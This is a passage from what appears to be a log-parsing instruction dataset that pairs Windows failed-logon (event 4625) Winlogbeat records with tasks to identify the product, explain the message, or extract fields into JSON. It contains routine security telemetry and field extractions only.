requested.\",\"organization\":\"stark\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"99.159.217.100\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6082954626",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "99.159.217.100",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t99.159.217.100\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"99.159.217.100","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t99.159.217.100\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"99.159.217.100","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 61238
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6082954626
streamName: microsoft-windows-security-auditing
clientIP: 99.159.217.100
userName: alice | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t250.192.142.162\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"250.192.142.162","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | {
"action": "Logon",
"clientport": 61238,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tbob\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t250.192.142.162\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"oscorp\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"250.192.142.162\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"bob\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6082954626",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "250.192.142.162",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t250.192.142.162\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"250.192.142.162","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t250.192.142.162\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"250.192.142.162","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 61238
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6082954626
streamName: microsoft-windows-security-auditing
clientIP: 250.192.142.162
userName: bob | Explain this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t153.202.14.113\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"153.202.14.113","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | {
"action": "Logon",
"clientport": 61238,
"message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t153.202.14.113\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"oscorp\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"153.202.14.113\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp 